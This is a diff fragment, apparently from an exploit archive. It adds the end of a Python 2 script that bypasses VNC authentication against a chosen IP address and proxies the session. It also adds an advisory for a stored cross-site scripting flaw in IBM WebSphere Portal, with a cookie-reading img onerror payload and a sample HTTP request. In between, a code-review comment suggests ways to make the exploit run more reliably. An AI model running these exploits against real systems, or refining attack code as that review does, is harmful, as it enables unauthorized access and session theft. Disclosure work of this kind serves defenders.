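+socket.setdefaulttimeout(5)
+server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+try:
+server.connect((host, port))
+except socket.error, msg:
+print '[*] Could not connect to the target VNC service. Error code: ' + str(msg[0]) + ' , Error message : ' + msg[1]
+sys.exit();
+else:
+hello = server.recv(12)
+print "[*] Hello From Server: " + hello
+if hello != "RFB 003.008\n":
+print "[*] The remote VNC service is not vulnerable"
+sys.exit()
+else:
+print "[*] The remote VNC service is vulnerable"
+listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+try:
+listener.bind((BIND_ADDR, BIND_PORT))
+except socket.error , msg:
+print '[*] Bind failed. Error Code : ' + str(msg[0]) + ' Message ' + msg[1]
+sys.exit()
+print "[*] Listener Socket Bind Complete"
+listener.listen(10)
+print "[*] Launching local vncviewer"
+thread.start_new_thread(os.system,('vncviewer ' + BIND_ADDR + '::' + str(BIND_PORT),))
+print "[*] Listener waiting for VNC connections on localhost"
+client, caddr = listener.accept()
+listener.close()
+client.send(hello)
+chello = client.recv(12)
+server.send(chello)
+methods = server.recv(2)
+print "[*] Auth Methods Recieved. Sending Null Authentication Option to Client"
+client.send("\x01\x01")
+client.recv(1)
+server.send("\x01")
+server.recv(4)
+client.send("\x00\x00\x00\x00")
+print "[*] Proxying data between the connections..."
+running = True
+while running:
+selected = select.select([client, server], [], [])[0]
+if client in selected:
+buf = client.recv(8192)
+if len(buf) == 0:
+running = False
+server.send(buf)
+if server in selected and running:
+buf = server.recv(8192)
+if len(buf) == 0:
+running = False
+client.send(buf)
+pass
+client.close()
+server.close()
+sys.exit()
+
+def printUsage():
+print "[*] Read the source, Luke!"
+
+def main():
+try:
+SERV_ADDR = sys.argv[1]
+SERV_PORT = sys.argv[2]
+except:
+SERV_ADDR = raw_input("[*] Please input an IP address to pwn: ")
+SERV_PORT = 5900
+try:
+socket.inet_aton(SERV_ADDR)
+except socket.error:
+printUsage()
+else:
+pwn4ge(SERV_ADDR, int(SERV_PORT))
+
+if __name__ == "__main__":
+main()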
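Review bot: The bare `except:` at the top of main() catches every exception, including KeyboardInterrupt, while the only failure it is meant to absorb is a missing argv entry; `except IndexError:` is the precise guard. The port is converted only later in `pwn4ge(SERV_ADDR, int(SERV_PORT))`, so a non-numeric second argument raises an uncaught ValueError after the address check has already passed; converting inside the try, or validating it alongside the inet_aton check, would route that case to printUsage() like the bad-address case. The `pass` after the proxy loop is dead and can be dropped. The header's `# Tested on:` line names only the target OS; since the file relies on `print` statements, `raw_input` and `except socket.error, msg`, a `# Requires: Python 2` line would save readers a failed run.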
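--- a/platforms/xml/webapps/36941.txt
+++ b/platforms/xml/webapps/36941.txt
@@ -0,0 +1,70 @@
+IBM WebSphere Portal Stored Cross-Site Scripting Vulnerability [CVE-2014-0910]
+
+[+] Author: Filippo Roncari
+[+] Target: IBM WebSphere Portal
+[+] Version: 7.0, 6.1.5, 6.1.0
+[+] Vendor: http://www.ibm.com
+[+] Accessibility: Remote
+[+] Severity: Medium
+[+] CVE: CVE-2014-0910
+[+] Full Advisory: https://www.securenetwork.it/docs/advisory/SN-14-04-IBM.pdf
+[+] Info: f.roncari@securenetwork.it
+
+
+[+] Summary
+IBM WebSphere Portal is a leader in the market product that provides enterprise web portals to help companies deliver a highly-personalized, social experience for their customers. IBM WebSphere Portal gives users a single point of access to the applications, services, information and social connections they need.
+
+
+[+] Vulnerability Details
+IBM WebSphere Portal is prone to a stored Cross-Site Scripting (XSS) vulnerability in the Web Content Management component, which allows authenticated users to inject arbitrary JavaScript.
+A potential attacker authenticated to the Web Content Management can exploit this vulnerability by creating a malicious web content and persuading the victim to visit it. This issue can lead to different kind of user-targeted attacks such as cookie stealing and account violation.
+
+
+[+] Technical Details
+View full advisory at https://www.securenetwork.it/docs/advisory/SN-14-04-IBM.pdf for technical details and source code.
+
+
+[+] Proof of Concept (PoC)
+Authors are able to insert HTML tags through the HTML view of the Rich Text Editor when creating a new web content, although active scripts are blocked and not executed. However it is possible to inject arbitrary JavaScript using a licit tag such as "img". Rich Text Editor tries to correctly handle the tag allowing client-side script being executed. A trivial payload like the following can be used:
+
+[!] Sample Payload
+-------------------------
+<img src=a onerror=alert(document.cookie)>
+-------------------------
+
+An exemplifying HTTP request is reported below.
+
+[!] PoC HTTP Request
+-------------------------
+POST portal/!ut/p/b1/pZHLboMwEEW_KLJJeC5HGHAQkJZQCt5EzqMmx[...] HTTP/1.1 Host:
+Proxy-Connection: keep-alive
+Content-Length: 20108
+Cache-Control: max-age=0
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAzBIVym1up1GRKBv Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch
+Accept-Language: it-IT,it;q=0.8,en-US;q=0.6,en;q=0.4
+Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
+
+------W ebKitFormBoundaryAzBIVym1up1GRKBv
+Content-Disposition: form-data; name="PC_Z7_CGAH47L00OJ790IAH1AFAN1GT0000000_wh"
+
+save_and_read_controllable
+------W ebKitFormBoundaryAzBIVym1up1GRKBv
+Content-Disposition: form-data; name="PC_Z7_CGAH47L00OJ790IAH1AFAN1GT0000000_wa"
+
+[...] true
+------W ebKitFormBoundaryAzBIVym1up1GRKBv
+Content-Disposition: form-data; name="cmpnt_map_19W14388ed1e14Content_inithtml"
+
+------W ebKitFormBoundaryAzBIVym1up1GRKBv
+Content-Disposition: form-data; name="PC_Z7_CGAH47L00OJ790IAH1AFAN1GT0000000_cmpnt_map_19W14388ed1e14Content"
+
+<img src=a onerror=alert(document.cookie)>
+------W ebKitFormBoundaryAzBIVym1up1GRKBv
+Content-Disposition: form-data; name="cmpnt_map_19W14388ed1e14_RTE"
+-------------------------
+
+For further details and explanations check the full advisory.
+
+
+[+] Disclaimer
+Permission is hereby granted for the redistribution of this alert, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author.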